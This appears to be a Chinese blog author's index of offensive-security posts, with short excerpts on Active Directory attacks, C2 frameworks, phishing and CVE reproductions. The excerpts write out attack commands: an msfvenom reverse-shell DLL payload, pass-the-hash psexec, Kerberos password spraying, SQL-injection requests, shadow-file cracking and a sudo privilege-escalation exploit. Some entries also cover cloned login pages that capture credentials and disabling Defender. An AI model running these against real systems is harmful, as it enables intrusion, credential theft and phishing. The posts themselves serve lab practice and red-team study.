Adsatrtgo
这个作者很懒,什么都没留下…
展开
-
使用Adfind和powerview查询域内特殊的ACL
域渗透中ACL的查询和设置原创 2023-07-19 00:59:08 · 382 阅读 · 0 评论 -
白加黑环境准备
白加黑dll挖掘与poc编写原创 2023-05-21 01:20:35 · 83 阅读 · 0 评论 -
Kerberoasting攻击步骤(简易)
域安全-Kerberoasting原创 2023-07-09 11:16:47 · 141 阅读 · 0 评论 -
ADCS ESC1+ESC4+CVE-2022–26923
ADCS域渗透相关原创 2023-06-27 02:44:22 · 321 阅读 · 0 评论 -
AttributeError: module ‘lib‘ has no attribute ‘OpenSSL_add_all_algorithms
crackmapexec安装与使用原创 2023-02-14 17:33:09 · 2587 阅读 · 0 评论 -
红蓝对抗--sliver 搭建
sliver C2搭建与安装过程原创 2022-12-04 16:49:14 · 1810 阅读 · 0 评论 -
Gophish 记录
攻防演练中的钓鱼原创 2022-11-26 21:16:24 · 505 阅读 · 0 评论 -
win11 defender关闭以及恢复
在工作的时候需要关闭def下可以参考原创 2022-11-07 16:28:03 · 2821 阅读 · 0 评论 -
ADCS relay
ADCS relay原创 2022-07-10 18:49:20 · 566 阅读 · 0 评论 -
ADCS-CVE-2022-26923域内提权漏洞-域控
本文复现了ADCS域内漏洞CVE-2022-26923原创 2022-07-10 15:04:03 · 381 阅读 · 0 评论 -
AD CS安装
本文带来了如何安装ADCS证书服务的安装记录原创 2022-07-10 13:41:23 · 400 阅读 · 0 评论 -
GitLab CVE-2021-22205复现
本文复现了GitLab CVE-2021-22204原创 2022-06-25 22:25:50 · 797 阅读 · 1 评论 -
anydesk 远程控制
静默状态远程控制原创 2022-06-23 01:06:12 · 342 阅读 · 0 评论 -
sqlserver clr学习
利用sqlserver clr提权或者执行命令准备源文件C:\cmd_exec.cs:using System;using System.Data;using System.Data.SqlClient;using System.Data.SqlTypes;using Microsoft.SqlServer.Server;using System.IO;using System.Diagnostics;using System.Text;public partial clas原创 2022-05-06 17:40:20 · 659 阅读 · 0 评论 -
通过SpringBoot-actuator组件观测内存shell注入效果
内存shell原创 2022-04-07 23:44:38 · 638 阅读 · 1 评论 -
macos:使用CrossC2上线macos至C2
目录修改cna文件:修改c2profile.c以及https.profile执行上线:项目地址:https://github.com/gloxec/CrossC2API文档以及相关资料:cna Demo · GitBook直接下载项目,主要文件genCrossC2.MacOS以及profile配置文件和.c文件修改cna文件:然后加载至C2修改c2profile.c以及https.profile要和和C2监听服务端的https beaconip/域名端口一..原创 2021-10-07 17:22:05 · 632 阅读 · 0 评论 -
cobaltstrike反制神器
git地址:https://github.com/hariomenkel/CobaltSpam需要下载的依赖:pip3 install PySockspip3 install stempip3install requestspip3 install rstr依次安装根据python3执行报错缺少的依赖依次安装。遇到pip3 install M2Crypto,mac环境下需要执行安装xcode-select --install 然后安装swig执行:python3 sp..原创 2021-09-20 00:45:16 · 2006 阅读 · 0 评论 -
CVE-2021-40444 复现
利用过程:在Office文档中添加恶意ActiveX控件,以此来诱导目标用户打开恶意文档复现环境:Ubuntu + WIN10利用工具:Github:https://github.com/lockedbyte/CVE-2021-404440x01 生成恶意dll :msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll > shell.dll需要提前下载lcab库.原创 2021-09-20 00:33:06 · 1545 阅读 · 1 评论 -
Cobaltstrike 不出网正向上线
目录Beacon TCPSMB Beaconlisten中继内网横向遇到目标不出网的几种情况Beacon TCP目标关闭防火墙,有一台主机出网,但是目标dc不出网,在原有出网主机的基础上尝试正向上线生成分段传输Stageless的exe目标机器执行exe出网主机尝试执行portscan 10.211.55.3 4444 none 64connect 10.211.55.3 4444上线成功断开连接unlin...原创 2021-08-06 13:04:20 · 1516 阅读 · 0 评论 -
psexec/PsExec/wmiexec
依赖于对方开启admin$共享或c$ (该共享默认开启,依赖于445端口)python版本python psexec.py -hashes LMhash:NTLMhash start/yonghuming@10.211.55.6python psexec.py start/yonghuming:password@10.211.55.6exe版本,PstoolPsExec.exe \\127.0.0.1 -u start\username -p pass cmd相关文..原创 2021-07-26 12:57:14 · 495 阅读 · 0 评论 -
某云云函数隐藏C2
云函数内容:向真实C2服务器传递客户端真实ip,转发GET、POST请求,内容参考https://mp.weixin.qq.com/s/3EM6vqPJSA5E_FH6tKO8iw部署后测试,访问API网关,真实服务器监听对应端口,查看数据包:服务端配置获取真实ip的必要配置,参考https://mp.weixin.qq.com/s/lL3UKCRW0cN4SgQIZl7vYwset sample_name "t";set sleeptime "3000";set ji原创 2021-05-09 17:54:04 · 716 阅读 · 0 评论 -
cobaltstrike证书修改
keytool -list -v -keystore cobaltstrike.store生成新证书keytool -keystore cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias baidu.cn -dname "CN=(cc), OU=(dd), O=(ee), L=(ff), ST=(gg), C=(hh)"原创 2021-04-25 15:06:29 · 933 阅读 · 2 评论 -
Exchange writeACL Dcsync连接域控
已有Exchange server权限,通过给指定用户writeACL 然后Dcsync导出域控哈希脚本地址如下https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1通过Adfind看是否已经写入aaa用户成功原创 2021-03-31 15:08:28 · 827 阅读 · 0 评论 -
exchange最新无条件RCE复现
环境:域控ip:10.211.55.3exchange2016 ip:10.211.55.8访问邮箱:攻击执行exp访问,验证之:原创 2021-03-14 22:22:50 · 1674 阅读 · 0 评论 -
域环境下exchange2016安装、测试
依赖包:1 https://dotnet.microsoft.com/download/dotnet-framework .NET Framework >4.7.2报错解决办法参考:https://www.cnblogs.com/microsoft-xin/p/10668777.html 下载博主的补丁包,依照顺序安装clearcompressionflag.exe、KB2919355、KB2932046、KB2959977、KB2937592、KB2938439、KB...原创 2021-03-12 16:28:03 · 971 阅读 · 0 评论 -
Linux sudo提权-cve-2021-3156
目前影响版本:1.8.2- 1.8.31p21.9.0- 1.9.5 p1复现kalisudo --version 查看版本如果存在漏洞,执行sudoedit -s /则返回如下下载exp:exp(点击下载)在tmp解压后编译执行:tar -xvzf CVE-2021-3156_nss_poc_ubuntu.tar.gzcd CVE-2021-3156/make &&./sudo-hax-me-a-sandwich 0...原创 2021-02-20 21:15:23 · 440 阅读 · 0 评论 -
Linux 密码破解
0x01获取/etc/passwd 与/etc/shadow文件内容,john的密码默认在/usr/share/john/password.lst下0x02使用unshadow生成,1个含有用户名和密码详细信息的文件,这里我们命名为test_passwdunshadow /etc/passwd /etc/shadow > test_passwd0x03开始破解:这里指定了要破解的用户名为rootjohn test_passwd --users=r...原创 2020-12-19 18:44:04 · 318 阅读 · 1 评论 -
域渗透-域内信息搜集
定位域控:ant.exe --host 10.211.55.1/24 -p 88,389 -m pscan1 非域内环境下:扫描88,3892 域内主机下:corp为域名nltest /dclist:corpDsQuery Server -domain corpnetdom query pdcset lognslookup -type=SRV _ldap._tcp.hacktest.comnet view /domain...原创 2020-10-18 13:04:31 · 744 阅读 · 0 评论 -
Kerberos端口域用户枚举与密码喷洒
环境域控环境:hacktest.com 10.211.55.3域内主机或者非域内主机:10.211.55.6域控Kerberos 88端口开启:工具准备https://github.com/ropnop/kerbrute/releases准备字典:111.txt用户枚举kerbrute_windows_amd64.exe userenum -d hacktest.com 111.txt密码喷洒kerbrute_windows_amd64.e原创 2020-10-13 22:20:25 · 1459 阅读 · 0 评论 -
无法与域“xxxx.com”的Active Directory域控制器(AD DC)连接 之DNS故障
域控机DC:win7加入域控报错,发现无法加入域环境,报错内容,“无法与域“xxxx.com”的Active Directory域控制器(AD DC)连接”:排查问题,发现DNS解析存在问题但是域控机上解析是没有问题的:抓包,发现本地DNS请求地址为ipV6,ipV6优先级高于Ipv4解决问题:修改虚拟机网卡配置关闭Ipv6返回虚拟机:重启网卡:解析通过:可以加入域:...原创 2020-10-12 14:07:21 · 22987 阅读 · 2 评论 -
WMI横向移动
项目地址:https://github.com/360-Linton-Lab/WMIHACKER执行命令回显:cscript WMIHACKER_0.6.vbs /cmd 10.211.55.3 administrator "Password!" "ipconfig" 1交互式shellcscript WMIHACKER_0.6.vbs /shell 10.211.55.3 administrator "Password"............原创 2020-10-06 20:46:33 · 779 阅读 · 0 评论 -
MS17-010之EquationExploit
关于永痕之蓝利用工具有:MSF railgun 以及EquationExploit工具地址:EquationExploit:https://github.com/1135/EquationExploit/tree/f5d6bbd1742d335cd94ad037b49765e0b820fcd3railgun检测扫描EquationExploit利用生成dll放入对应目录修改配置文件:利用,先0建立通道 后101上线C2...原创 2020-10-05 12:24:01 · 266 阅读 · 0 评论 -
ABPTTS内网端口映射
通过ABPTTS web脚本映射目标主机端口到本地,适用于exe文件不能落地,需要将端口转发到本地虚拟机:本机:本机生成webshell后,连接代理并映射3389端口到本机python abpttsclient.py -c webshell/config.txt -u http://10.211.55.6:8080/muma/abptts.jsp -f 0.0.0.0:33389/10.211.55.6:3389本地端口监听情况:本地连接:...原创 2020-09-07 10:17:29 · 626 阅读 · 0 评论 -
Go编译exe程序指定图标
0x01 下载依赖go get github.com/akavel/rsrc下载后在项目工程目录可见:0x02 制作图标在线ico图标生成,生成后放到要编译的go的文件同目录下0x03 生成相关文件编译创建manifest文件, 命名:xxxx.exe.manifest<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microso原创 2020-08-31 12:40:11 · 3648 阅读 · 4 评论 -
mac制作图形化应用实现点击启动冰蝎/CobaltStrike等应用或者jar包
主要是为了方便制作快捷启动应用程序,将命令行启动软件改成点击图片启动0x01原创 2020-08-31 10:52:00 · 1086 阅读 · 0 评论 -
使用CobaltStrike制作钓鱼网站
0x01 寻找网站模板找有登录框的或者你想克隆的网站0x02 CS克隆网站,并开启输入监听填写克隆地址,勾选键盘监听下一步填写VPS公网地址:然后点击site按钮后,可以查看到钓鱼的服务端口以及状态0x03访问测试访问vps的ip以及对应端口输入测试查看web日志看到用户输入账号密码...原创 2020-08-13 18:34:25 · 2951 阅读 · 1 评论 -
mssql 获取网站绝对路径写shell
1 存在sql注入创建表GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1Host: 360gongfang.comConnection: closeCache-Control: max-age=0Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel M原创 2020-08-13 15:08:16 · 3134 阅读 · 0 评论 -
使用sublime快速文本去重/去空格/去某字符后内容
使用Oneforall搜集子域名后,有很多重复的域名,这里不用写脚本去重,通过sublime正则快速去重搜索替换,点击正则部分,正则为:(^.*\n)(?=\1)统一将重复部分替换为空:原创 2020-08-11 12:46:36 · 4371 阅读 · 0 评论 -
使用CobaltStrike制作宏文件钓鱼
0x01 生成宏代码选择对应的监听器复制宏代码0x02 制作宏文档选择宏的位置为当前位置,这样才能保存到当前文档替换为刚才复制的宏代码保存的时候选择正确的格式,否则不会触发然后到桌面,可以手工修改文件后缀名为.doc,如果你的office开启宏则无提示,默认情况下有需要开启宏的提示,点击确定启用宏就会执行shellcode运行后上线至cs,目前这种方式局限于win系统,mac无rundll32进程...原创 2020-08-10 15:48:40 · 1120 阅读 · 0 评论 -
nmap扫描导出xml并查看
1 扫描设置不挂代理nmap -p- -v -sV -Pn -iL ip.txt -oA output挂代理如:proxychains则需要加参数-sT2 修改xml文件查看修改输出文件将xml文件拖入 ie查看原创 2020-08-03 16:30:55 · 4545 阅读 · 0 评论